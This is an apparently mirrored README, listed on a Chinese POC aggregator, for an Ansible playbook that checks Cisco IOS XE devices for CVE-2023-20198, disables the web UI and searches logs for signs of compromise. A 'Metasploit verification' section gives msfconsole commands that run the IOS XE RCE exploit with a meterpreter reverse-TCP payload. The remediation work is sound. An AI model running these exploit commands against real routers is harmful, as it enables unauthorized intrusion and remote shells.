POC详情: 8c43708ec9f69f8c9c109be25234a86c8f6a31be

来源
关联漏洞
标题: Cisco IOS XE Software 安全漏洞 (CVE-2023-20198)
描述:Cisco IOS XE Software是美国思科(Cisco)公司的一个操作系统。用于企业有线和无线访问,汇聚,核心和WAN的单一操作系统,Cisco IOS XE降低了业务和网络的复杂性。 Cisco IOS XE Software 存在安全漏洞,该漏洞源于允许未经身份验证的远程攻击者在受影响的系统上创建具有特权的帐户。
描述
Check for and remediate conditions that make an IOS-XE device vulnerable to CVE-2023-20198
介绍
# CVE-2023-20198-Fix

This repository contains an Ansible playbook for remediating the CVE-2023-20198 vulnerability found in certain Cisco devices.

It does the following:
1. Checks if the web service is running on the router by checking for the associated commands in the running config
2. Disables the web service if running
3. Saves the configuration if changed
4. Checks the logs for signs of previous exploitation

---

## Directory Structure:
``` bash
CVE-2023-20198-Fix/
│
├── ansible.cfg            # Ansible configuration file
├── group_vars/            # Directory for variables specific to groups of hosts
│   └── iosxe_devices.yml  # Variable definitions for IOS-XE devices
├── inventory.yml          # Inventory of hosts, including devices to target
└── remediate.yml          # Playbook for remediating CVE-2023-20198
```

## Getting Started
### Prerequisites
Ensure you have Ansible installed on your control machine. This playbook was written for Ansible 2.9 or newer.

### Setup
Configure Ansible:
Edit ansible.cfg to match your environment settings.

### Inventory:
Update inventory.yml with the host details of your IOS-XE devices. 

### Variables:
Define any necessary variables in group_vars/iosxe_devices.yml. This should include any common settings for your IOS-XE devices, such as connection settings and credentials.

### Adding Hosts to Inventory
To add a new IOS-XE device to the inventory, edit the inventory.yml file and append the new host under the appropriate group:

```yaml
iosxe_devices:
  hosts:
    vulnerable_router01:
      ansible_host: 192.168.1.3
      # ... other necessary variables
```

Replace new_router01 with your device's hostname and the ansible_* variables with the actual values for your device.

### Updating Group Variables
If you need to update credentials or other settings for the group of IOS-XE devices, edit the group_vars/iosxe_devices.yml file:

```yaml
---
ansible_network_os: ios
ansible_connection: network_cli
ansible_user: admin
ansible_password: admin_password            # Lab use only, store credentials responsibly!
ansible_become_method: enable
ansible_become_password: admin_password     # Lab use only, store credentials responsibly!
# ... other variables
```


## Running the Playbook
To execute the playbook, use the following command:

```bash
ansible-playbook remediate.yml -i inventory.yml
```


---

## Metasploit verification

### MSF6 Commands

``` bash
use exploit/linux/misc/cisco_ios_xe_rce
set RHOST 192.168.10.242     # Your target IP
set target 1
set payload cmd/unix/python/meterpreter/reverse_tcp
check
exploit
```

### Pre Remediation check

![Before](/docs/kali_0.PNG)

### Playbook Run
 
![run](/docs/ansible-playbook_run.PNG)

### Post Remediation check

![Before](/docs/kali_1.PNG)


## Testing
Always test your changes in a controlled environment before running the playbook in production.

## Security
Store sensitive data such as passwords and secret keys using Ansible Vault. Do not store plaintext credentials in your inventory or group_vars files.

For additional security measures and best practices, consult [Ansible's official documentation](https://docs.ansible.com/ansible/latest/index.html).

Please replace all placeholder values with actual data that corresponds to your environment. This README assumes a basic familiarity with Ansible concepts such as inventory, variables, and running playbooks.
文件快照

[4.0K] /data/pocs/8c43708ec9f69f8c9c109be25234a86c8f6a31be ├── [ 38] ansible.cfg ├── [4.0K] docs │   ├── [153K] ansible-playbook_run.PNG │   ├── [258K] kali_0.PNG │   └── [209K] kali_1.PNG ├── [4.0K] group_vars │   └── [ 351] iosxe_devices.yml ├── [ 106] inventory.yml ├── [1.0K] LICENSE ├── [3.4K] README.md └── [1.4K] remediate.yml 2 directories, 9 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。